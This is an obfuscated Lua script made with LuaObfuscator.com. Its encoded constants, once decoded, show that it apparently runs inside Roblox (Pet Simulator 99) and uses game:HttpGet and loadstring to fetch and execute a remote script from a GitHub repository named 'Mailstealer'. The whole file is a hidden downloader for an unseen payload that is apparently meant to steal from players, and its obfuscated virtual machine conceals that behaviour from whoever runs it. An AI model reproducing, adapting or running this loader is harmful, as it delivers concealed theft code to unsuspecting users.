--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==2) then function v22()local v31=0;local v32;while true do if ((2 -1)==v31) then return v32;end if ((0 -0)==v31) then v32=v1(v16,v19,v19);v19=v19 + (1 -0) ;v31=1;end end end v23=nil;function v23()local v33,v34=v1(v16,v19,v19 + 2 );v19=v19 + (4 -2) ;return (v34 * (875 -(555 + 64))) + v33 ;end v18=3;end if (v18==4) then function v25()local v35=931 -(857 + (198 -124)) ;local v36;local v37;local v38;local v39;local v40;local v41;while true do if (v35==(569 -(367 + 201))) then v38=928 -(214 + 713) ;v39=(v21(v37,1 + 0 ,36 -16 ) * ((1 + 1)^(909 -(282 + 595)))) + v36 ;v35=1639 -(1523 + 114) ;end if ((0 + 0)==v35) then v36=v24();v37=v24();v35=(1 + 0) -0 ;end if (v35==(999 -(915 + 82))) then v40=v21(v37,1086 -(68 + 997) ,1301 -((639 -413) + 1044) );v41=((v21(v37,139 -107 )==(118 -(32 + 85))) and  -(1 + 0)) or 1 ;v35=1 + 0 + 2 ;end if (v35==(960 -((1172 -280) + 65))) then if (v40==(0 -0)) then if (v39==(0 -0)) then return v41 * (0 -0) ;else v40=351 -(87 + 263) ;v38=0;end elseif (v40==((3414 -(1069 + 118)) -(67 + 113))) then return ((v39==0) and (v41 * ((1 + (0 -0))/(0 -0)))) or (v41 * NaN) ;end return v8(v41,v40-(753 + 270) ) * (v38 + (v39/((7 -5)^(1004 -(802 + 150))))) ;end end end v26=nil;function v26(v42)local v43;if  not v42 then v42=v24();if (v42==(0 -0)) then return "";end end v43=v3(v16,v19,(v19 + v42) -(1 + 0) );v19=v19 + v42 ;local v44={};for v68=1 -0 , #v43 do v44[v68]=v2(v1(v3(v43,v68,v68)));end return v6(v44);end v18=5;end if (v18==6) then v29=nil;function v29()local v45=0 + 0 ;local v46;local v47;local v48;local v49;local v50;local v51;local v52;while true do if (0==v45) then local v93=0;while true do if (v93~=0) then else v46=0 -0 ;v47=nil;v93=1;end if (1~=v93) then else v45=1;break;end end end if (v45~=(9 -6)) then else v52=nil;while true do local v96=0;while true do if (v96~=0) then else local v101=0;while true do if (v101~=0) then else if (v46~=(1050 -(67 + 980))) then else local v152=0;while true do if (v152==(1474 -(1329 + 145))) then for v172=972 -(140 + 831) ,v24() do v48[v172-(1851 -(1409 + 441)) ]=v29();end return v50;end end end if (v46==(720 -(15 + 703))) then local v153=0 + 0 ;while true do if (v153~=0) then else for v174=1,v51 do local v175=0;local v176;local v177;local v178;while true do if (v175==(438 -(262 + 176))) then v176=0;v177=nil;v175=1722 -(345 + 1376) ;end if (v175~=1) then else v178=nil;while true do if (v176==(688 -(198 + 490))) then local v183=0 -0 ;while true do if (v183==(0 -0)) then v177=v22();v178=nil;v183=1207 -(696 + 510) ;end if (1==v183) then v176=1 -0 ;break;end end end if (v176==(1263 -(1091 + 171))) then if (v177==1) then v178=v22()~=0 ;elseif (v177==(1 + 1)) then v178=v25();elseif (v177==3) then v178=v26();end v52[v174]=v178;break;end end break;end end end v50[3]=v22();v153=3 -2 ;end if (v153==(3 -2)) then for v179=375 -(123 + 251) ,v24() do local v180=0;local v181;local v182;while true do if (v180==1) then while true do if (v181==(0 -0)) then v182=v22();if (v21(v182,699 -(208 + 490) ,1 + 0 )==0) then local v185=0 + 0 ;local v186;local v187;local v188;local v189;while true do if (v185~=(836 -(660 + 176))) then else local v190=0;while true do if (v190==0) then v186=0 + 0 ;v187=nil;v190=203 -(14 + 188) ;end if (v190~=1) then else v185=676 -(534 + 141) ;break;end end end if (v185==2) then while true do if (v186~=(1 + 1)) then else if (v21(v188,1 + 0 ,1)==1) then v189[2 + 0 ]=v52[v189[2]];end if (v21(v188,2,3 -1 )==1) then v189[4 -1 ]=v52[v189[8 -5 ]];end v186=2 + 1 ;end if (v186==1) then v189={v23(),v23(),nil,nil};if (v187==0) then local v197=0 -0 ;local v198;local v199;while true do if (v197==1) then while true do if (v198~=0) then else v199=0 + 0 ;while true do if (v199~=(0 -0)) then else v189[10 -7 ]=v23();v189[4]=v23();break;end end break;end end break;end if (v197==(867 -(550 + 317))) then v198=0 -0 ;v199=nil;v197=1 -0 ;end end elseif (v187==1) then v189[8 -5 ]=v24();elseif (v187==2) then v189[3]=v24() -(2^(301 -(134 + 151))) ;elseif (v187==(1668 -(970 + 695))) then local v204=0;local v205;while true do if (v204==0) then v205=0;while true do if (v205==(0 -0)) then v189[3]=v24() -((1992 -(582 + 1408))^16) ;v189[13 -9 ]=v23();break;end end break;end end end v186=2 -0 ;end if (v186==3) then if (v21(v188,3,11 -8 )==1) then v189[1828 -(1195 + 629) ]=v52[v189[5 -1 ]];end v47[v179]=v189;break;end if (v186==(241 -(187 + 54))) then v187=v21(v182,2,783 -(162 + 618) );v188=v21(v182,4,5 + 1 );v186=1;end end break;end if (v185~=1) then else local v191=0 + 0 ;while true do if (v191==(0 -0)) then v188=nil;v189=nil;v191=1;end if (v191~=1) then else v185=2;break;end end end end end break;end end break;end if (v180==(0 -0)) then v181=0;v182=nil;v180=1 + 0 ;end end end v46=1639 -(1373 + 263) ;break;end end end v101=1001 -(451 + 549) ;end if ((1 + 0)==v101) then v96=1 -0 ;break;end end end if (v96==1) then if (1~=v46) then else local v114=0;local v115;while true do if (v114==(0 -0)) then v115=1384 -(746 + 638) ;while true do if (v115==1) then v52={};v46=2;break;end if ((0 + 0)==v115) then v50={v47,v48,nil,v49};v51=v24();v115=1;end end break;end end end if (v46~=0) then else local v116=0;while true do if (v116~=0) then else v47={};v48={};v116=1;end if (v116~=(1582 -(1535 + 46))) then else v49={};v46=1 + 0 ;break;end end end break;end end end break;end if (v45==(1 + 1)) then local v94=0;while true do if (v94~=(560 -(306 + 254))) then else v50=nil;v51=nil;v94=1;end if (v94~=(1 + 0)) then else v45=3;break;end end end if (v45==(1 -0)) then local v95=1467 -(899 + 568) ;while true do if (v95==(0 + 0)) then v48=nil;v49=nil;v95=1;end if (v95==(2 -1)) then v45=605 -(268 + 335) ;break;end end end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v53)if (v1(v53,2)==79) then local v84=0;while true do if (v84==0) then v20=v0(v3(v53,1,1));return "";end end else local v85=0;local v86;while true do if (v85==0) then v86=v2(v0(v53,16));if v20 then local v102=v5(v86,v20);v20=nil;return v102;else return v86;end break;end end end end);v18=1;end if (v18==3) then v24=nil;function v24()local v54=0 -(0 + 0) ;local v55;local v56;local v57;local v58;while true do if (v54==(291 -(60 + 230))) then return (v58 * (16778240 -(706 + 318))) + (v57 * (66108 -(426 + 146))) + (v56 * (31 + 225)) + v55 ;end if (v54==(1456 -(282 + 1174))) then v55,v56,v57,v58=v1(v16,v19,v19 + (7 -4) );v19=v19 + ((2315 -(1408 + 92)) -(569 + 242)) ;v54=701 -(271 + (1515 -(461 + 625))) ;end end end v25=nil;v18=4;end if (v18==7) then function v30(v59,v60,v61)local v62=v59[1];local v63=v59[2];local v64=v59[3];return function(...)local v70=v62;local v71=v63;local v72=v64;local v73=v28;local v74=1;local v75= -1;local v76={};local v77={...};local v78=v12("#",...) -1 ;local v79={};local v80={};for v87=0,v78 do if (v87>=v72) then v76[v87-v72 ]=v77[v87 + 1 ];else v80[v87]=v77[v87 + 1 ];end end local v81=(v78-v72) + 1 ;local v82;local v83;while true do v82=v70[v74];v83=v82[1];if (v83<=5) then if (v83<=2) then if (v83<=0) then do return;end elseif (v83==1) then local v117=0;local v118;while true do if (v117==0) then v118=v82[2];v80[v118]=v80[v118](v13(v80,v118 + 1 ,v75));break;end end else v74=v82[3];end elseif (v83<=3) then local v103=0;local v104;local v105;local v106;local v107;local v108;while true do if (v103==7) then v82=v70[v74];v80[v82[2]]();v74=v74 + 1 ;v82=v70[v74];v74=v82[3];break;end if (v103==1) then v74=v74 + 1 ;v82=v70[v74];if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v61;else v80[v82[2]]=v61[v82[3]];end v74=v74 + 1 ;v82=v70[v74];v103=2;end if (v103==5) then v108=v82[2];v105,v106=v73(v80[v108](v13(v80,v108 + 1 ,v82[3])));v75=(v106 + v108) -1 ;v104=0;for v154=v108,v75 do v104=v104 + 1 ;v80[v154]=v105[v104];end v103=6;end if (6==v103) then v74=v74 + 1 ;v82=v70[v74];v108=v82[2];v80[v108]=v80[v108](v13(v80,v108 + 1 ,v75));v74=v74 + 1 ;v103=7;end if (v103==0) then v104=nil;v105,v106=nil;v107=nil;v108=nil;v61[v82[3]]=v80[v82[2]];v103=1;end if (4==v103) then v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3]~=0 ;v74=v74 + 1 ;v82=v70[v74];v103=5;end if (v103==3) then v80[v108 + 1 ]=v107;v80[v108]=v107[v82[4]];v74=v74 + 1 ;v82=v70[v74];v80[v82[2]]=v82[3];v103=4;end if (v103==2) then if ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v61;else v80[v82[2]]=v61[v82[3]];end v74=v74 + 1 ;v82=v70[v74];v108=v82[2];v107=v80[v82[3]];v103=3;end end elseif (v83==4) then v80[v82[2]]=v82[3]~=0 ;elseif ((v82[3]=="_ENV") or (v82[3]=="getfenv")) then v80[v82[2]]=v61;else v80[v82[2]]=v61[v82[3]];end elseif (v83<=8) then if (v83<=6) then if (v80[v82[2]]==v82[4]) then v74=v74 + 1 ;else v74=v82[3];end elseif (v83>7) then v61[v82[3]]=v80[v82[2]];else v80[v82[2]]();end elseif (v83<=9) then local v109=0;local v110;local v111;local v112;local v113;while true do if (2==v109) then for v160=v110,v75 do v113=v113 + 1 ;v80[v160]=v111[v113];end break;end if (v109==0) then v110=v82[2];v111,v112=v73(v80[v110](v13(v80,v110 + 1 ,v82[3])));v109=1;end if (1==v109) then v75=(v112 + v110) -1 ;v113=0;v109=2;end end elseif (v83>10) then v80[v82[2]]=v82[3];else local v126=v82[2];local v127=v80[v82[3]];v80[v126 + 1 ]=v127;v80[v126]=v127[v82[4]];end v74=v74 + 1 ;end end;end return v30(v29(),{},v17)(...);end if (v18==1) then v21=nil;function v21(v65,v66,v67)if v67 then local v90=(v65/((1290 -(993 + 295))^(v66-(1 + 0))))%(2^(((v67-(1172 -(418 + 179 + 574))) -(v66-1)) + (1323 -(1249 + 73)) + 0)) ;return v90-(v90%(1 + 0)) ;else local v91=0 + 0 ;local v92;while true do if (v91==(0 + 0)) then v92=((1146 -(466 + 679)) + 1)^(v66-(530 -(406 + 123))) ;return (((v65%(v92 + v92))>=v92) and (1770 -(1749 + 20))) or 0 ;end end end end v22=nil;v18=2;end end end v15("LOL!073O00028O0003043O0075736572030F3O0070657473696D2O395F736372697074030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403453O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F6D2O61726C2O6F77312F4D61696C737465616C65722F6D61696E2F70732O392E74787400103O00120B3O00013O0026063O0001000100010004023O0001000100120B000100033O001203000100023O00122O000100043O00122O000200053O00202O00020002000600122O000400076O000500016O000200056O00013O00024O00010001000100044O000F00010004023O000100016O00017O00",v9(),...);